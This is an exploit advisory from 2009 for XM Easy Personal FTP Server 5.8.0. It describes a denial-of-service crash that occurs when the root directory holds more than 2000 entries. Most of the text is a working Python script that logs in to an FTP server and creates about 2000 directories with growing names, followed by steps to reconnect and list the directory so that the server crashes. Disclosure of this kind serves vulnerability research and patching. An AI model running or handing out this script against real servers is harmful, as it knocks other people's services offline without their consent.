################### Date of Discovery: 24-Nov-2009 Credits:leinakesi[at]gmail.com Vendor: Dxmsoft ******************************************************************************* Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected ******************************************************************************* Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root directory. ******************************************************************************* Details: if you could log on the server, take the following steps and the server will crash which lead to DoS. 1.upload 2000 files or folders. 2.close the current connection. 3.use a ftp client to reconnect the server. user ... pass ... port ... list ... crash!!!!!! ******************************************************************************* Exploit example: 1.upload 2000 folders. #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py \n") print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] test_string='a' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) for i in range(1,200): sock.send("mkd " + "a" * i +"\r\n") print "[-] " + ("mkd " + "a" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "b" * i +"\r\n") print "[-] " + ("mkd " + "b" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "c" * i +"\r\n") print "[-] " + ("mkd " + "c" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "d" * i +"\r\n") print "[-] " + ("mkd " + "d" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "e" * i +"\r\n") print "[-] " + ("mkd " + "e" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "f" * i +"\r\n") print "[-] " + ("mkd " + "f" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "g" * i +"\r\n") print "[-] " + ("mkd " + "g" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "h" * i +"\r\n") print "[-] " + ("mkd " + "h" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "i" * i +"\r\n") print "[-] " + ("mkd " + "i" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "j" * i +"\r\n") print "[-] " + ("mkd " + "j" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" sock.close() sys.exit(0); 2.use a ftp client to reconnect the server for example: start->run->cmd->ftp 127.0.0.1->*****->*****->dir